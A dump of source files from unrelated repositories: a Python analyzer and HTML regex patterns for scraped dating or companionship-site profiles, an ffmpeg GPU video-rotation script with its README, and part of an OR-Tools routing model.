origins_women = []\n service_types = []\n service_types_men = []\n service_types_women = []\n lives = []\n lives_men = []\n lives_women = []\n\n def callback(row):\n age = str(row[3].replace('岁', ''))\n gender = row[2].strip()\n education = row[9].strip()\n live_cities = []\n for r in jieba.cut(row[12], cut_all=True):\n live_cities.append(r)\n if len(live_cities) == 0:\n live_cities.append('其它')\n first = live_cities[0].strip()\n if first:\n if len(first) >= 2:\n live = live_cities[0].strip()\n if live == '马来':\n live = '马来西亚'\n else:\n live = '其他'\n else:\n live = '其他'\n origin = row[13].strip()\n services_tmp = row[18].strip().split(\";\")\n services = []\n for v in services_tmp:\n if v.strip():\n services.append(v.strip())\n ages.append(age)\n educations.append(education)\n origins.append(origin)\n service_types.extend(services)\n lives.append(live)\n if gender == \"男\":\n ages_men.append(age)\n educations_men.append(education)\n origins_men.append(origin)\n service_types_men.extend(services)\n lives_men.append(live)\n elif gender == \"女\":\n ages_women.append(age)\n educations_women.append(education)\n origins_women.append(origin)\n service_types_women.extend(services)\n lives_women.append(live)\n genders.append(gender)\n\n self._read_csv_file(callback)\n\n self.ages_dict = OrderedDict(sorted(Counter(ages).items()))\n self.ages_men_dict = OrderedDict(sorted(Counter(ages_men).items()))\n self.ages_women_dict = OrderedDict(sorted(Counter(ages_women).items()))\n self.genders_dict = OrderedDict(sorted(Counter(genders).items()))\n self.educations_dict = OrderedDict(sorted(Counter(educations).items()))\n self.educations_men_dict = OrderedDict(sorted(Counter(educations_men).items()))\n self.educations_women_dict = OrderedDict(sorted(Counter(educations_women).items()))\n self.service_types_dict = OrderedDict(sorted(Counter(service_types).items()))\n self.service_types_men_dict = OrderedDict(sorted(Counter(service_types_men).items()))\n self.service_types_women_dict = OrderedDict(sorted(Counter(service_types_women).items()))\n self.origin_dict = OrderedDict(sorted(Counter(origins).items()))\n self.origin_men_dict = OrderedDict(sorted(Counter(origins_men).items()))\n self.origin_women_dict = OrderedDict(sorted(Counter(origins_women).items()))\n self.lives_dict = OrderedDict(sorted(Counter(lives).items()))\n self.lives_men_dict = OrderedDict(sorted(Counter(lives_men).items()))\n self.lives_women_dict = OrderedDict(sorted(Counter(lives_women).items()))\n\n self.has_parse_file = True\n\n def _read_csv_file(self, parse_line_callback):\n with open(self.csv_file, mode=\"rt\", encoding=\"utf8\", buffering=8192) as f:\n reader = csv.reader(f)\n header = next(reader)\n for row in reader:\n parse_line_callback(row)\n\n def analyze(self):\n if not self.has_parse_file:\n self.parse_csv_file()\n self.print_tables()\n self.gen_images()\n self.save_to_xlsx()\n\n def print_tables(self):\n ages = [self.ages_dict, self.ages_men_dict, self.ages_women_dict]\n services = [self.service_types_dict, self.service_types_men_dict, self.service_types_women_dict]\n edus = [self.educations_dict, self.educations_men_dict, self.educations_women_dict]\n origins = [self.origin_dict, self.origin_men_dict, self.origin_women_dict]\n cities = [self.lives_dict, self.lives_men_dict, self.lives_women_dict]\n printer = TablePrinter(ages, services, edus, origins, cities)\n printer.print_tables()\n\n def save_to_xlsx(self):\n ages = [self.ages_dict, self.ages_men_dict, self.ages_women_dict]\n services = [self.service_types_dict, self.service_types_men_dict, self.service_types_women_dict]\n edus = [self.educations_dict, self.educations_men_dict, self.educations_women_dict]\n origins = [self.origin_dict, self.origin_men_dict, self.origin_women_dict]\n cities = [self.lives_dict, self.lives_men_dict, self.lives_women_dict]\n saver = XLSXSaver(filename=\"datas.xlsx\", ages=ages, services=services,\n educations=edus, origins=origins, cities=cities)\n saver.save_to_xlsx()\n\n def gen_images(self):\n ages = [self.ages_dict, self.ages_men_dict, self.ages_women_dict]\n services = [self.service_types_dict, self.service_types_men_dict, self.service_types_women_dict]\n edus = [self.educations_dict, self.educations_men_dict, self.educations_women_dict]\n origins = [self.origin_dict, self.origin_men_dict, self.origin_women_dict]\n cities = [self.lives_dict, self.lives_men_dict, self.lives_women_dict]\n generator = ImageGenerator(ages, services, edus, origins, cities)\n generator.gen_images()\n\n\nif __name__ == \"__main__\":\n v = Analyzer(\"/home/allen/PycharmProjects/datas/www89yn_data/0_info_20180609.csv\")\n v.analyze()\n" }, { "alpha_fraction": 0.5388017892837524, "alphanum_fraction": 0.5709690451622009, "avg_line_length": 37.261539459228516, "blob_id": "9e7d41873ecfe3104e587593efdb01fdf87fc311", "content_id": "b84fd1c499acc306a075cafc5b74b31e0c7c5090", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3037, "license_type": "permissive", "max_line_length": 72, "num_lines": 65, "path": "/bajiuwang/patterns.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "import re\n\n\nclass Patterns:\n # <li>可去地区:<span>待议 </span></li>\n # <li>是否收费:<span>收费<FONT COLOR=#888888>..</FONT></span></li>\n # <li>服务时间:<span>待议 </span></li>\n # <li>使用语种:<span>普通话 </span></li>\n # <li>提供服务:<span>待议</span></li>\n # <li>兴趣爱好:<span>聊天, 赚钱 </span></li>\n # <li>性格类型:<span>阳光, 活泼可爱 </span></li>\n # <li>心情留言:<span>找工作 </span></li>\n\n PATTERN_AREA = re.compile(\"可去地区\")\n PATTERN_PAYMENT = re.compile(\"是否收费\")\n PATTERN_SERVE_TIME = re.compile(\"服务时间\")\n PATTERN_LANGUAGE = re.compile(\"使用语种\")\n PATTERN_SERVICE_TYPE_PROVIDED = re.compile(\"提供服务\")\n PATTERN_SERVICE_TYPE_NEEDED = re.compile(\"所需服务\")\n PATTERN_HOBBITS = re.compile(\"兴趣爱好\")\n PATTERN_CHARACTERISTIC = re.compile(\"性格类型\")\n PATTERN_MESSAGE = re.compile(\"心情留言\")\n\n # <li class=\"li539\"><span>昵  称:鑫大宝</span> </li>\n # <li class=\"li539\"><SPAN>I  D:</SPAN>700002&nbsp;&nbsp;\n # <!--诚意 登陆时间-->\n # 诚意:22<IMG alt=\"\" src=\"imageszny/images/cy2.gif\" align=\"absMiddle\">\n #\n # </li>\n # </li>\n # <li class=\"li265\"><SPAN>性  别:</SPAN>女</li>\n # <li class=\"li265\"><SPAN>年  龄:</SPAN>24岁</li>\n # <li class=\"li265\"><SPAN>出生年月:</SPAN>1987-8-19</li>\n # <li class=\"li265\"><SPAN>星  座:</SPAN>狮子</li>\n # <li class=\"li265\"><SPAN>身  高:</SPAN>162CM</li>\n # <li class=\"li265\"><SPAN>体  重:</SPAN>55KG</li>\n # <li class=\"li265\"><SPAN>体  形:</SPAN>匀称</li>\n # <li class=\"li265\"><SPAN>学  历:</SPAN>中专</li>\n # <li class=\"li265\"><SPAN>婚  姻:</SPAN>未婚</li>\n # <li class=\"li265\"><SPAN>职  业:</SPAN>医生</li>\n # <li class=\"li265\"><SPAN>居住城市:</SPAN>黑龙江&nbsp;哈尔滨\n # </li>\n # <li class=\"li265\"><SPAN>籍  贯:</SPAN>山东</li>\n # <li class=\"li265\"><SPAN>注册日期:</SPAN>VIP会员可见</li>\n # <li class=\"li265\"><SPAN>登陆日期:</SPAN>VIP会员可见</li>\n # </ul>\n\n PATTERN_NAME = re.compile(\"昵  称\")\n PATTERN_ID = re.compile(\"I  D\")\n PATTERN_GENDER = re.compile(\"性  别\")\n PATTERN_AGE = re.compile(\"年  龄\")\n PATTERN_BIRTH = re.compile(\"出生年月\")\n PATTERN_CONSTELLATION = re.compile(\"星  座\")\n PATTERN_HEIGHT = re.compile(\"身  高\")\n PATTERN_WEIGHT = re.compile(\"体  重\")\n PATTERN_SIZE = re.compile(\"体  形\")\n PATTERN_DEGREE = re.compile(\"学  历\")\n PATTERN_MARRIAGE = re.compile(\"婚  姻\")\n PATTERN_OCCUPATIONAL = re.compile(\"职  业\")\n PATTERN_LIVES = re.compile(\"居住城市\")\n PATTERN_ORIGIN = re.compile(\"籍  贯\")\n\n PATTERN_TYPE_1 = re.compile(\"[/<>SPANlispan;&b\\\"]\")\n PATTERN_TYPE_ID = re.compile(\"[</>a-zA-Z&;]\")\n PATTERN_TYPE_PAYMENT = re.compile(\"[</>a-zA-Z0-9=.#]\")\n" }, { "alpha_fraction": 0.6250850558280945, "alphanum_fraction": 0.6307552456855774, "avg_line_length": 38.36606979370117, "blob_id": "adc0e82d8c8753e803f179acfb09c78f8adebe9a", "content_id": "f214a0dc1362985bd7a1e292f1fe23ce8219aecd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4409, "license_type": "permissive", "max_line_length": 112, "num_lines": 112, "path": "/bajiuwang/csv_image_generator.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "import os\n\nimport matplotlib.pyplot as plt\n\n\nclass ImageGenerator:\n\n def __init__(self, ages, services, educations, origins, cities):\n self.ages_all_dict = ages[0]\n self.ages_men_dict = ages[1]\n self.ages_women_dict = ages[2]\n self.services_all_dict = services[0]\n self.services_men_dict = services[1]\n self.services_women_dict = services[2]\n self.edus_all_dict = educations[0]\n self.edus_men_dict = educations[1]\n self.edus_women_dict = educations[2]\n self.origins_all_dict = origins[0]\n self.origins_men_dict = origins[1]\n self.origins_women_dict = origins[2]\n self.cities_all_dict = cities[0]\n self.cities_men_dict = cities[1]\n self.cities_women_dict = cities[2]\n\n @staticmethod\n def _total_value(values):\n total = 0\n for v in values:\n total += int(v)\n return total\n\n def plot_age_line(self):\n plt.figure(figsize=(10, 7))\n plt.title('Age distribution line chart')\n plt.plot(self.ages_all_dict.keys(), self.ages_all_dict.values())\n plt.xlabel('Age')\n plt.savefig(\"images/age_line.png\")\n\n def plot_age_pie(self):\n self._plot_pie(\"Age distribution pie chart\", self.ages_all_dict, \"age_pie.png\")\n\n def plot_age_men_pie(self):\n self._plot_pie(\"Male age distribution pie chart\", self.ages_men_dict, \"age_men_pie.png\")\n\n def plot_age_women_pie(self):\n self._plot_pie(\"Female age distribution pie chart\", self.ages_women_dict, \"age_women_pie.png\")\n\n def _plot_pie(self, title, collection, filename, rotatelabels=False):\n total = self._total_value(collection.values())\n plt.figure(figsize=(7, 7))\n plt.title(title)\n labels = []\n for k, v in collection.items():\n v = \"%s - %.2f\" % (k, int(v) / total * 100)\n labels.append(v + \"%\")\n plt.pie(collection.values(), labels=labels, rotatelabels=rotatelabels)\n plt.savefig(os.path.join(os.path.dirname(__file__), \"images\", filename))\n\n def plot_service_types_pie(self):\n self._plot_pie(\"Service types distribution pie chart\", self.services_all_dict, \"service_types_pie.png\")\n\n def plot_service_types_men_pie(self):\n self._plot_pie(\"Male service types distribution pie chart\", self.services_men_dict,\n \"service_types_men_pie.png\")\n\n def plot_service_types_women_pie(self):\n self._plot_pie(\"Female service types distribution pie chart\", self.services_women_dict,\n \"service_types_women_pie.png\")\n\n def plot_edus_pie(self):\n self._plot_pie(\"Educations distribution pie chart\", self.edus_all_dict, \"educations_pie.png\")\n\n def plot_edus_men_pie(self):\n self._plot_pie(\"Male educations distribution pie chart\", self.edus_men_dict, \"educations_men_pie.png\")\n\n def plot_edus_women_pie(self):\n self._plot_pie(\"Female educations distribution pie chart\", self.edus_women_dict, \"educations_women.png\")\n\n def plot_origins_pie(self):\n self._plot_pie(\"Origins distribution pie chart\", self.origins_all_dict, \"origins_pie.png\")\n\n def plot_origins_men_pie(self):\n self._plot_pie(\"Male origins distribution pie chart\", self.origins_men_dict, \"origins_men_pie.png\")\n\n def plot_origins_women_pie(self):\n self._plot_pie(\"Female origins distribution pie chart\", self.origins_women_dict, \"origins_women.png\")\n\n def plot_cities_pie(self):\n self._plot_pie(\"Cities distribution pie chart\", self.cities_all_dict, \"cities_pie.png\")\n\n def plot_cities_men_pie(self):\n self._plot_pie(\"Male cities distribution pie chart\", self.cities_men_dict, \"cities_men_pie.png\")\n\n def plot_cities_women_pie(self):\n self._plot_pie(\"Female cities distribution pie chart\", self.cities_women_dict, \"cities_women_pie.png\")\n\n def gen_images(self):\n self.plot_age_pie()\n self.plot_age_men_pie()\n self.plot_age_women_pie()\n self.plot_service_types_pie()\n self.plot_service_types_men_pie()\n self.plot_service_types_women_pie()\n self.plot_edus_pie()\n self.plot_edus_men_pie()\n self.plot_edus_women_pie()\n self.plot_origins_pie()\n self.plot_origins_men_pie()\n self.plot_edus_women_pie()\n self.plot_cities_pie()\n self.plot_cities_men_pie()\n self.plot_cities_women_pie()\n" } ]
14
instillai/video-rotation-gpu
https://github.com/instillai/video-rotation-gpu
1ff08076992483c5e66c9e07491b6899b777366e
5367560b0cebaa9843c0528a5cc70afbf2841cdc
abfaee80a5e82da595a04dbf2cbd1472941aa08d
refs/heads/master
2021-10-19T01:28:17.821959
2019-02-16T20:50:59
2019-02-16T20:50:59
170,967,439
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.6643936634063721, "alphanum_fraction": 0.6692070960998535, "avg_line_length": 42.21965408325195, "blob_id": "40bc770979e921137bd5a0f446472483175f340e", "content_id": "e2bba0514a68203455634dd5e619dda3352933fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7479, "license_type": "no_license", "max_line_length": 188, "num_lines": 173, "path": "/README.md", "repo_name": "instillai/video-rotation-gpu", "src_encoding": "UTF-8", "text": "\n# Rotation of Video using FFMPEG With NVIDIA GPU Acceleration on Ubuntu\n---------------------------------------------------------------------\n\nThis tutorial deals with video rotation using GPU accelerated libraries\nsupported by FFMPEG in Ubuntu 16.04. The code here belongs to [\"GPU Based Video Rotation Using Python on Ubuntu\"](https://machinelearningmindset.com/gpu-based-video-rotation-ffmpeg/) post.\n<!-- ####################### ####################### ####################### ####################### -->\n<!-- ####################### ####################### ####################### ####################### -->\n<!-- ####################### ####################### ####################### ####################### -->\n<!-- ####################### ####################### ####################### ####################### -->\n## Introduction\n------------\n\n**FFmpeg** is one of the most famous multimedia frameworks wich is\nwidely used for processeing videos. In order to encode the video,\ncertainly a video encoder must be used. The popular\n`x264` is the one which is widely used however it is not\nsuper fast! The lastest `NVIDIA GPUs` contain a\nhardware-based video encoder called `NVENC` which is much\nfaster than traditional ones. In order to be able to utilize this\ngpu-accelerated encoder, FFmpeg must be installed with NVENC support.\nThe full documentation of FFmpeg integrated with NVIDIA can be fount at\n[here](https://developer.nvidia.com/ffmpeg). documentation on NVENC can\nbe found\n[here](https://developer.nvidia.com/nvidia-video-codec-sdk#NVENCFeatures).\nMoreover The NVENC programming guide can be found\n[here](https://developer.nvidia.com/nvidia-video-codec-sdk#NVENCFeatures).\n\nIn this tutorial the main goal is to show how to do video rotation with\nGPU-accelerated libraries in Linux. In this tutorial we do not use the\nterminal commands directly for employing the FFmpeg with NVENC support.\nInstead the python interface is being used to run commands in the\nterminal. This can be done using `subprocess` python\nmodule. This module is employed for execution and dealing external\ncommands, intended to supercede the `os.sys` module. The\ntrivial method os its usage will be explained in this tutorial. Please\nrefer to [this\ndocumentation](https://docs.python.org/2/library/subprocess.html) for\nfurther details.\n\nThe assumption of this tutorial is that the FFmpeg is already installed\nwith NVENC support. The installation guide can be found in [FFMPEG WITH\nNVIDIA ACCELERATION ON UBUNTU\nLINUX](http://developer.download.nvidia.com/compute/redist/ffmpeg/1511-patch/FFMPEG-with-NVIDIA-Acceleration-on-Ubuntu_UG_v01.pdf)\ndocumentation provided by NVIDIA.\n\n## Data Indicator\n--------------\n\nThis tutorial is customized for processing multiple videos. The\nassumption is that the full path of each video is stored in a\n`.txt` file in line-by-line format. The example of the\n\".txt\" file is as below:\n<p align=\"center\">\n <img src=\"_images/txtfileformat.png\"><br>\n <b>Figure 1: The format of .txt file.</b><br>\n</p>\n\nAs a guidance if a recursive search for specific files in a directory\nand its subdirectories with extension `\".png\"` is\ndesired, the following method in command line is useful and it saves the\noutput as a \".txt\" file:\n```shell\nfind /absolute/path/to/directory/to/be/search -type f -name\n \"\\*.png\" &gt; /absolute/path/to/save/the/output/textfile.txt\n```\n\n## Video Rotation\n--------------\n\nFrom now on the assumption is that the \".txt\" file is ready and\nwell-formatted. The python script for processing videos is as below:\n```python\n import subprocess\n import os\n\n # Pre...\n textfile_path = 'videos.txt'\n output_prefix = 'front'\n\n # Read the text file line by line.\n with open(textfile_path) as f:\n content = f.readlines()\n\n # Remove whitespace characters like `\\n` at the end of each line\n files_list = [x.strip() for x in content]\n\n # Transpose 90 degree & Clockwise\n # It already save the video file using the the named defined by output_name.\n for file_num, file_path in enumerate(files_list, start=1):\n\n # Get the file name with extension\n file_name = os.path.basename(file_path)\n\n # Get the file name without extension\n raw_file_name = os.path.basename(file_name).split('.')[0]\n\n # Get the input file directory path.\n file_dir = os.path.dirname(file_path)\n\n # Form the output file full path.\n output_file_path = file_dir + '/' + output_prefix + '_' + raw_file_name + '.mov'\n\n print('processing file: %s' % file_path)\n subprocess.call(\n ['ffmpeg', '-i', file_path, '-vf', 'transpose=1', '-vcodec', 'nvenc',\n '-preset', 'slow', '-b:v', '5M',\n '-acodec', 'copy', output_file_path])\n print('file %s saved' % output_file_path)\n```\n\n### I - Overall Code Description\n\nThe `videos.txt` file is saved in the absolute path.\n**Lines 8-13** of the code reads the \".txt\" file and stores each line as\nan item of a list called `files\\_list`. The loop starts\nat **line 17** process each file with the\n`subprocess.call` command. In each loop the folder of the\ninput file is found and the output file will be stored in the same\ndirectory but with different naming convention which is explaned by the\ncomments in the code. Each `,` in the `subprocess.call` command in the python is correspondant\nto `an empty space` in the terminal. As an example the\ncorrespondant shell command is as below:\n```shell\nffmpeg -i file\\_path -filter:v transpose=-1 -vcodec nvenc -preset\n slow -b:v 5M -acodec copy output\\_file\\_path\n```\n\n### II - FFmpeg Encoder\n\nThe command executed by **FFmpeg** needs to be described. Each of the\nelements started by `-` are calling specific operations\nand the command follows by them execute the desired operation. For\nexample `-vcodec` indicator will specify the **codec** to\nbe used by **FFmpeg** and **nvenc** which follows by that point to the\ncodec. More details can be found at [FFmpeg Filters\nDocumentation](http://ffmpeg.org/ffmpeg-filters.html). The fllowing\nTable, summarize the indicators:\n\n| Attribute | Description | option | Description |\n| :-------------: | :-------------: | :-----: | :-----: |\n| -i | input argument | file\\_path | path to the input file |\n| -vf | alias for -filter:v | transpose=1 | clockwise rotation by 90 |\n| -vcodec | Set the video codec | nvenc | Nvidia Gpu accelerated library |\n| -preset | increase the quality | slow | improves quality |\n| -b:v | set the video bitrate | 5M | Set to 5M |\n| -acodec | set the audio codec | copy | only copied and no encoding |\n\n\nThe `-vf` is the main command which its full\ndocumentation is available at\n[here](https://ffmpeg.org/ffmpeg.html#filter_005foption) and it has the\n**filter options**.\n## Code Execution\n--------------\n\nIn order to run the python file we go to the terminal and execute the\nfollowing:\n```shell\npython /absolute/path/to/python/file\n\n```\n\nAs a consideration, if we are working on any specific virtual\nenvironment it has to be activated at first.\n## Summary\n-------\n\nThis tutorial demonstrated how to process a video and specifictly\nrotating that using **FFmpeg** and Nvidia GPU accelerated library called\n**NVENC**. The advantage of using python interface is to easily parse\nthe **.txt** file and looping through all files. Moreover it enables the\nuser with options which are more complex to be directly employed in the\nterminal environment.\n\n" }, { "alpha_fraction": 0.6776947975158691, "alphanum_fraction": 0.6846318244934082, "avg_line_length": 35.74509811401367, "blob_id": "17eeb445a87192c26532c200058a0d3ab4f4b5b8", "content_id": "34504be99d8b84bb83a053e8fb754764a86d5dcd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1874, "license_type": "no_license", "max_line_length": 110, "num_lines": 51, "path": "/python/RotateVideo.py", "repo_name": "instillai/video-rotation-gpu", "src_encoding": "UTF-8", "text": "\"\"\"\nThe subprocess module provides an interface to working with additional processes. It offers a higher-level\ninterface than some of the other available modules. It is intended to replace functions such as os.system().\nIn this code it is used to rotate a video file with the support of \"ffmpeg\" by the ubuntu.\n\nThe reason behind using python rather than command line is its higher flexibility to dig into file paths and\ndoing further processes online.\n\nThis python module:\n\n 1 - Read a text file which directs to video files paths.\n 2 - Make a list of those paths.\n 3 - Read the list files one by one.\n 4 - Rotate each video 90 degrees clockwise.\n 5 - Save the file in the same folder with prefix \"front\".\n\"\"\"\nimport subprocess\nimport os\n\n# Pre...\ntextfile_path = 'videos.txt'\noutput_prefix = 'front'\n\n# Read the text file line by line.\nwith open(textfile_path) as f:\n content = f.readlines()\n\n# Remove whitespace characters like `\\n` at the end of each line\nfiles_list = [x.strip() for x in content]\n\n# Transpose 90 degree & Clockwise\n# It already save the video file using the the named defined by output_name.\nfor file_num, file_path in enumerate(files_list, start=1):\n\n # Get the file name with extension\n file_name = os.path.basename(file_path)\n\n # Get the file name without extension\n raw_file_name = os.path.basename(file_name).split('.')[0]\n\n # Get the input file directory path.\n file_dir = os.path.dirname(file_path)\n\n # Form the output file full path.\n output_file_path = file_dir + '/' + output_prefix + '_' + raw_file_name + '.mov'\n\n print('processing file: %s' % file_path)\n subprocess.call(\n ['ffmpeg', '-i', file_path, '-vf', 'transpose=1', '-vcodec', 'nvenc', '-preset', 'slow', '-b:v', '5M',\n '-acodec', 'copy', output_file_path])\n print('file %s saved' % output_file_path)\n" } ]
2
vrushabh-shah/DS
https://github.com/vrushabh-shah/DS
f452e91ebd381486acf6f7009ebd668ba6455d6b
8ddc086fcb605bb872504e71100e65323804adad
6f2ad6a4f040987e58a970a6c79d4404c1fef0bc
refs/heads/master
2022-12-17T05:48:54.239301
2020-09-29T20:42:59
2020-09-29T20:42:59
279,406,985
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.48288974165916443, "alphanum_fraction": 0.4904943108558655, "avg_line_length": 16, "blob_id": "6ae4562655fdbb9366120df443223af9bc1e6f3f", "content_id": "89010985d16355f85bef777494cd703b1307fcb0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 526, "license_type": "no_license", "max_line_length": 47, "num_lines": 31, "path": "/demo.py", "repo_name": "vrushabh-shah/DS", "src_encoding": "UTF-8", "text": "'''\ninput : list[str]\noutput :list[list[]]\n each list : 3 to 5\n'''\n\n# input = [a,b,c,d,e]\n# example output : a,b,c ,.. so on\n\ndef groups(list):\n #basic\n if not list:\n return [[]]\n\n n = len(list)\n start = 0\n end = n\n window_size = 3\n ans = []\n while start < end:\n int_ans = list[start:start+window_size]\n ans.append(int_ans)\n if start + window_size < n:\n start += window_size\n else:\n break\n\n return ans\n\n\nprint (groups(['a','b','c','d','e']))" } ]
1
UANDES-ICC6120-201810/control-compiler
https://github.com/UANDES-ICC6120-201810/control-compiler
7ca81630a9a6808cfd0c5b17998c848aa247f446
96e51d476d52eafc4e674c560b89d81031e6dbe1
43f8dfafd233497daf34e5d1224db51476fa1c0f
refs/heads/master
2020-03-21T17:02:36.008859
2018-07-05T17:17:05
2018-07-05T17:17:05
138,809,570
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6186813116073608, "alphanum_fraction": 0.6238095164299011, "avg_line_length": 26.57575798034668, "blob_id": "cc0a5615042f102f51938410171ccc261c6786a0", "content_id": "8babf55ef2d4094802475bc2711f21cb7df05495", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2730, "license_type": "no_license", "max_line_length": 112, "num_lines": 99, "path": "/compiler-script.py", "repo_name": "UANDES-ICC6120-201810/control-compiler", "src_encoding": "UTF-8", "text": "import mysql.connector\nimport requests\nfrom time import sleep\n\nAPI_HOST = 'http://proyectozapo.herokuapp.com/api/v1'\nAPI_COMPILER_ENDPOINT = '{0}/vehicle_event'.format(API_HOST)\nCLIENT_SECRET = 'Bearer eyJhbGciOiJIUzI1NiJ9.eyJidXNfc3RvcF9jb2RlIjoiUEM2MjEifQ.kAbz6orY0Er1sZmKrPfMjzYm36cW3wiO_sYyNK43rKk'\n\nCONN_PARAMS = {\n 'user': 'ALPR',\n 'password': 'PASSALPR',\n 'host': 'docker-db',\n 'database': 'control_point'\n}\n\ndef connect_to_db(conn_params):\n while True:\n try:\n print \"[Info] Connecting to db\"\n connection = mysql.connector.connect(buffered=True, **conn_params)\n print \"[Info] Connection successful!\"\n return connection\n except mysql.connector.errors.InterfaceError:\n print \"[Error] Couldn't connect to database. Retrying...\"\n sleep(1)\n\ndef fetch_plates(connection):\n select_cursor = connection.cursor()\n query = 'SELECT id, plate, submitted FROM plate_readings'\n select_cursor.execute(query)\n results = select_cursor.fetchall()\n\n select_cursor.close()\n\n return results\n\ndef generate_post_body(result_row):\n row_id, plate, submitted = result_row\n\n body = {\n 'plate_number': plate,\n 'speed': 0,\n 'event_time': submitted\n }\n\n return body\n\ndef post_plate(body, on_success, *args):\n response = post_with_retry(data=body)\n plate = body['plate_number']\n\n if response.status_code == 201:\n print_post_info('succeeded', response.status_code, plate)\n\n on_success(*args)\n else:\n print_post_info('failed', response.status_code, plate)\n\ndef post_with_retry(data):\n while True:\n try:\n response = requests.post(API_COMPILER_ENDPOINT, data=data, headers={'Authorization': CLIENT_SECRET})\n return response\n except requests.exceptions.ConnectionError:\n print \"[Error] Post failed. Retrying...\"\n\ndef print_post_info(status, code, plate):\n print \"[Info] Post {0}!\".format(status)\n print \"[Info] Code: {0}\".format(code)\n print \"[Info] Plate: {0}\".format(plate)\n\ndef delete_plate_from_db(connection, plate_id):\n delete_cursor = connection.cursor()\n delete_query = 'DELETE FROM plate_readings WHERE id=' + str(plate_id)\n delete_cursor.execute(delete_query)\n connection.commit()\n delete_cursor.close()\n\ndef main():\n while True:\n sleep(10)\n connection = connect_to_db(CONN_PARAMS)\n\n results = fetch_plates(connection)\n\n if len(results) == 0:\n print \"[Info] No plates in database\"\n continue\n\n for result_row in results:\n row_id = result_row[0]\n\n body = generate_post_body(result_row)\n post_plate(body, delete_plate_from_db, connection, row_id)\n\n connection.close()\n\nif __name__ == '__main__':\n main()\n" } ]
1
doflamingo0/Planning_Optimization
https://github.com/doflamingo0/Planning_Optimization
a58a3765eca69df5cf4b355d9f1c52e21f745239
b21ee5bae47da62360ea5fd73bc311ea281d8f6e
051ca53375f60d3fc7d23552bdba7cc6b311b5e3
refs/heads/master
2023-05-11T21:03:59.483655
2021-06-02T02:45:18
2021-06-02T02:45:18
357,422,292
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5167986750602722, "alphanum_fraction": 0.5427478551864624, "avg_line_length": 24.78169059753418, "blob_id": "1a5b9788cad50e6847b3f3cc46282156bebbd105", "content_id": "69aae275f8c6bf59401af2d7eb2e8088f817dee8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3661, "license_type": "no_license", "max_line_length": 93, "num_lines": 142, "path": "/Project-optimal-CP-v3.py", "repo_name": "doflamingo0/Planning_Optimization", "src_encoding": "UTF-8", "text": "import time\nfrom ortools.sat.python import cp_model\nimport numpy as np\n#input\ndef input(fileName):\n with open(fileName, 'r') as f:\n [N, M] = [int(x) for x in f.readline().split()]\n \n # them cot 0 vao cot Q[i][0]\n Q = []\n for i in range(N):\n tmp =[int(x) for x in f.readline().split()]\n tmp.append(int(0))\n tmp = tmp[-1:] + tmp[:-1]\n Q.append(tmp)\n\n d = []\n for i in range(M+1):\n d.append([int(x) for x in f.readline().split()])\n \n q = [int(x) for x in f.readline().split()]\n \n return N, M, Q, d, q\n\nt1 = time.time()\nN,M,Q,d,q = input('test_30_14.txt')\n# xu ly du lieu\n# maxd la tong tat ca cac canh cua do thi duong di\nmaxd = 0\nfor i in range(M+1):\n for j in range(i+1,M+1):\n maxd = maxd + d[i][j]\n# total[i] la tong so luong cua moi mat hang i\ntotal = [0 for i in range(N)]\nfor i in range(N):\n for j in range(M+1):\n total[i] = total[i] + Q[i][j]\n\n#model\n# variable\nmodel = cp_model.CpModel()\n\nx = {}\nfor i in range(M+2):\n for j in range(M+2):\n if i != j:\n x[i, j] = model.NewIntVar(0, 1, 'x['+str(i) +', '+str(j)+']')\n\n# neu ke i duoc i duoc den thi y[i] =1 va nguoc lai\ny = [model.NewIntVar(0,1,'y['+str(i)+']') for i in range(0,M+2)]\n# tong quang duong tu 0 den diem i\nz = [model.NewIntVar(0,maxd,'z['+str(i)+']') for i in range(0,M+2)]\n\n#constraint\n#khoi tao gia bien\nmodel.Add(y[0]==1)\nmodel.Add(y[M+1]==1)\nmodel.Add(z[0]==0)\nmodel.Add(sum(x[0,i] for i in range(1,M+1))==1)\nmodel.Add(sum(x[i,M+1] for i in range(1,M+1))==1)\n\n#constraint 2\n\nfor i in range(M+1):\n for j in range(1,M+2):\n \tif i !=j:\n\t # x[i] = j => y[i] +y[j] =2\n\t b= model.NewBoolVar('b')\n\t model.Add(x[i,j]==1).OnlyEnforceIf(b)\n\t model.Add(x[i,j]!=1).OnlyEnforceIf(b.Not())\n\t model.Add(y[i]+y[j]==2).OnlyEnforceIf(b)\n#constraint 3\nfor i in range(1,M+1):\n\tb= model.NewBoolVar('b')\n\tmodel.Add(y[i]==1).OnlyEnforceIf(b)\n\tmodel.Add(y[i]!=1).OnlyEnforceIf(b.Not())\n\tmodel.Add(sum(x[i,j] for j in range(1,M+2) if i!=j)==1).OnlyEnforceIf(b)\n\n\t\t\t\n\n\n#constraint 4\nfor i in range(1,M+1):\n\tb= model.NewBoolVar('b')\n\tmodel.Add(y[i]==1).OnlyEnforceIf(b)\n\tmodel.Add(y[i]!=1).OnlyEnforceIf(b.Not())\n\tmodel.Add(sum(x[j,i] for j in range(M+1) if i!=j)==1).OnlyEnforceIf(b)\n\n\n#constraint 5\nfor i in range(M+1):\n for j in range(1,M+2):\n \tif i!=j:\n\t b= model.NewBoolVar('b')\n\t model.Add(x[i,j]==1).OnlyEnforceIf(b)\n\t model.Add(x[i,j]!=1).OnlyEnforceIf(b.Not())\n\t model.Add(z[i]+d[i%(M+1)][j%(M+1)]==z[j]).OnlyEnforceIf(b)\n\n#constraint 5\nfor i in range(N):\n model.Add(sum(Q[i][j]*y[j] for j in range(M+1)) >= q[i])\nfor i in range(N):\n model.Add(sum(Q[i][j]*y[j] for j in range(M+1)) <= total[i])\n\n#objective\nf = 